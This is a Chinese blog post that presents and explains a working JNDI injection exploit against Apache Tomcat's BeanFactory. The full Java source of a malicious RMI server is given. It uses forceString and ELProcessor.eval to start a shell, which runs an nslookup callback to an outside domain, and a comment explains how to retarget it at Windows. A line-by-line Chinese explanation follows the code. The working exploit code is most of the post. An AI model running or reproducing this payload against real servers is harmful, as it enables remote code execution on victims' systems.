Apache Tomcat BeanFactory +EL表达式注入

于 2024-07-17 20:06:21 发布
阅读量122 收藏 3
点赞数 6
文章标签: java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_85480529/article/details/140504281
版权 
import java.rmi.registry.*;
import com.sun.jndi.rmi.registry.*;
import javax.naming.*;
import org.apache.naming.ResourceRef;

public class EvilRMIServerNew {
    public static void main(String[] args) throws Exception {
        System.out.println("Creating evil RMI registry on port 1097");
        Registry registry = LocateRegistry.createRegistry(1097);

        //prepare payload that exploits unsafe reflection in org.apache.naming.factory.BeanFactory
        ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true,"org.apache.naming.factory.BeanFactory",null);
        //redefine a setter name for the 'x' property from 'setX' to 'eval', see BeanFactory.getObjectInstance code
        ref.add(new StringRefAddr("forceString", "x=eval"));
        //expression language to execute 'nslookupjndi.s.artsploit.com', modify /bin/sh to cmd.exe if you target windows
        ref.add(new StringRefAddr("x", "\\"\\".getClass().forName(\\"javax.script.ScriptEngineManager\\").newInstance().getEngineByName(\\"JavaScript\\").eval(\\"new java.lang.ProcessBuilder['(java.lang.String[])'](['/bin/sh','-c','nslookupjndi.s.artsploit.com']).start()\\")"));

        ReferenceWrapper referenceWrapper = new com.sun.jndi.rmi.registry.ReferenceWrapper(ref);
        registry.bind("Object", referenceWrapper);
    }
}

上面的代码片段展示了如何利用 Apache Tomcat 中的 org.apache.naming.factory.BeanFactory 类,通过反射机制创建任意 Java Bean 实例,并调用它的 setter 方法来执行恶意代码。

以下是代码的详细解释:

ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true,"org.apache.naming.factory.BeanFactory",null);

这一行代码创建了一个 ResourceRef 对象。ResourceRef 是一种特殊类型的引用对象,用于描述资源(如数据库连接、消息队列等)。在这个例子中,它用于描述一个 Java 对象。构造函数的参数包括:

  • "javax.el.ELProcessor":目标类的全限定名,这里是 javax.el.ELProcessor
  • null"" 等:这些参数通常用于描述资源的其他属性,这里都为空或默认值。
  • "org.apache.naming.factory.BeanFactory":指定用于解析这个引用的工厂类,这里是 org.apache.naming.factory.BeanFactory
// redefine a setter name for the 'x' property from 'setX' to 'eval', see BeanFactory.getObjectInstance code
ref.add(new StringRefAddr("forceString", "x=eval"));

这一行代码通过 forceString 属性重新定义了 x 属性的 setter 方法名。通常情况,setter 方法名是 setX,但这里被重新定义为 eval。这样,当 BeanFactory 调用 setter 方法时,会调用 eval 方法而不是 setX

// expression language to execute 'nslookupjndi.s.artsploit.com', modify /bin/sh to cmd.exe if you target windows
ref.add(new StringRefAddr("x", "\\"\\".getClass().forName(\\"javax.script.ScriptEngineManager\\").newInstance().getEngineByName(\\"JavaScript\\").eval(\\"new java.lang.ProcessBuilder['(java.lang.String[])'](['/bin/sh','-c','nslookupjndi.s.artsploit.com']).start()\\")"));

这一行代码设置了 x 属性的值,该值是一个恶意的 EL 表达式。具体来说,这个表达式利用了 javax.script.ScriptEngineManager 来执行任意 JavaScript 代码。在这个例子中,JavaScript 代码创建了一个新的进程,执行 nslookup jndi.s.artsploit.com 命令。这个命令将尝试连接到指定的域名,通常用于验证漏洞利用是否成功。

总结:

  • 这个代码片段通过 ResourceRefBeanFactory 类,利用反射机制在目标 Java 应用程序中创建一个任意类实例。
  • 通过设置 forceString 属性,恶意代码可以指定调用的 setter 方法名。
  • 最终的 EL 表达式被执行,触发远程代码执行(RCE),在受害者的系统上执行任意命令。

这个例子演示了如何利用 JNDI 注入漏洞,通过反射和表达式语言注入来实现远程代码执行。

2401_85480529
关注
  • 6
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Spring Boot 1.5.3 源码深入分析
刘本龙的专栏
03-29 3134
  更多springboot2.X文章请移步至博主专栏:spring boot 2.X/spring cloud Greenwich   目录 1. 项目初始化过程 springboot启动类 SpringFactoriesLoader工厂加载机制 总结初始化initialize过程 run方法: spring事件 自定义spring事件 springboot启动过程中的事件广...
笔记+面试题
一只肥嘟嘟的日常
02-15 1万+
笔记+面试
apache开源项目源码commons-el-1.0-src(全部高质量el表达式java源程序)
01-27
apache开源项目源码commons-el-1.0-src 全部高质量el表达式java源程序 java,el,el表达式,el表达式源码,apache开源项目源码commons-el-1.0-src 各种el表达式操作工具类源码,你会从中得到意想不到的效果! apache开源组织开发的开源项目源码,其优良的代码风格和高质量的源码是学习者难得的学习资料!
EL表达式
weixin_46139261的博客
02-17 131
什么是EL表达式? EL是expression Language的缩写,它是jsp内置的一种表达式语言,从jsp2.0开如,就不让在使用jsp脚本,而是使用el表达式来替换jsp中jsp脚本 EL表达式作用 获取域数据 获取常用web对象 EL表达式格式 ${表达式} 使用el表达式的主要是代替jsp页面上的<%=%>,也就是说,el表达式主要作用是向浏览器输出数据 使用el表达...
EL表达式(源代码)
06-08
EL表达式,全名为Expression Language。它原本是JSTL 1.0为方便存取数据所自定义的语言。当时EL只能在JSTL 标签中使用,JSP2.0后,EL成为JSP规范的一部分,并增加了新的特性。
第七章 EL表达式
伊甸园的博客
05-29 365
1.EL表达式获取域中数据 EL最主要的作用是获得四大域中的数据,格式${EL表达式} EL获得pageContext域中的值:${pageContextScope.key}; EL获得request域中的值:${requestScope.key}; EL获得session域中的值:${sessionScope.key}; EL获得application域中的值:${applicationScope.key}; EL从四个域中获得某个值${key}; ---依次从pageContext域,req
互联网应用主流框架整合【控制反转和注入
最新发布
Davieyang.D.Y
05-15 9323
IoC容器、依赖、Bean、注解(附源码)
spring + spring mvc + tomcat 面试题(史上最全)下篇
javalingyu的博客
04-16 501
场景1:单例的setter注入 这种注入方式应该是spring用的最多的,代码如下: @Service publicclass TestService1 { @Autowired private TestService2 testService2; public void test1() { } } @Service publicclass TestService2 { @Autowired private TestService1 testSer
架构师修炼系列【Spring生态概述】
Davieyang.D.Y
10-23 2万+
Spring框架是为了解决企业应用开发的复杂性而诞生的,它简化了Java应用开发,提高了可测性和可重用性;其核心理念之一是通过依赖注入(DI)的方式来实现控制反转(loC),核心理念之二便是面向切面编程(AOP);作为轻量级的IoC容器,Spring框架可轻松实现与其他多种框架的整合,其逐步成为Java企业级开发最流行的框架,形成了以框架为核心的生态圈,成为Java应用开发的一站式解决方案
JSP的EL表达式(常与apache的JSTL搞混)
成大事不在于力量多少,而在能坚持多久。
10-19 613
EL是Expression Language的简称,意思是表达式语言。它是JSP 2.0
el 能否定义作用域变量_Java学习72天---EL和JSTL表达式学完.
weixin_39867142的博客
11-29 147
EL和JSTL表达主要是用于JSP中,JSTL是EL的扩展,他们的缺陷就是只能获取作用域中的值 作用域: session request response pageContext 第93次(EL)学习主题:EL学习目标:1 掌握 EL表达式基本语法2 掌握EL表达式获取作用域数据3 掌握EL表达式的判断 例如为空判断 相等判断 不等判断 注: EL表达式只能获取作用域...
CVE-2020-9296-Netflix-Conductor-RCE-漏洞分析
xj28555的博客
06-22 1604
漏洞通告 https://github.com/Netflix/security-bulletins/blob/master/advisories/nflx-2020-001.md Netflix Conductor是 Netflix 开发的一款工作流编排的引擎,项目地址:https://github.com/Netflix/conductor,本次漏洞成因在于自定义约束冲突时的错误信息支持了 Java EL 表达式,而且这部分错误信息是攻击者可控的,所以攻击者可以通过注入 Java EL 表达式进行.
Java安全』EL表达式注入
Ho1aAs‘s Blog
04-02 5044
文章目录前言EL表达式解析启用/禁用EL表达式注入绕过方式1. 反射2. js引擎rce参考引用完 前言 EL表达式全称Express Language EL表达式语法以${}包裹 其他使用方法见参考文章 EL表达式解析启用/禁用 默认为启用,jsp会解析EL表达式,除非配置<%@ page isELIgnored ="true|false" %>,或者是全局pom.xml设置 <jsp-config> <jsp-property-group>
EL表达式详解
热门推荐
浅然的专栏
04-08 10万+
该篇博客主要关于EL表达式,废话不多说=-=进入正题 博客目录 1、EL表达式介绍 2、EL获取数据 3、EL中的内置对象 4、EL访问Bean的属性 5、EL访问数组中的数据 6、EL获取list中数据 7、EL访问Map 8、EL中的运算符(empty) 9、自定义EL函数 10、总结 一、EL表达式介绍 Ex...
el表达式实现原理
snakewarhead的专栏
03-31 1万+
jstl标签中的el在路径org.apache.taglibs.standard.lang.support下,有个叫 ExpressionEvaluatorManager.evaluate 的方法,当el表达式作为入参时,调用这个方法,在tag内即可自动把el表达式转化。ExpressionEvaluatorManager.evaluate有四个参数。第一个表示tag的名字,在取el表达式出错时使用。一般和属性名 字相同。第二个要求字符串,通常简单调用输入对象的toString方法。第三个是类,通常用Ob
EL表达式的常见用法和说明。(简单易懂)
GeekYoung的博客
08-08 6089
目录 EL基础语法 EL从JavaBean中读取数据 EL从数组中读取数据 EL从List中读取数据 EL从Map中读取数据 EL基础语法 EL表达式只能读数据,不能修改数据。 EL表达式只能出现在静态部分,不能出现在java代码块中。 EL表达式不会抛出异常,在出现异常时,EL表达式将会以空白显示。 表达式只能从四大域中读取数据。 如果四大域内中有相同属性名,那么EL表达式...
浅析EL表达式注入漏洞
火柴人的博客
05-17 964
https://xz.aliyun.com/t/7692
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值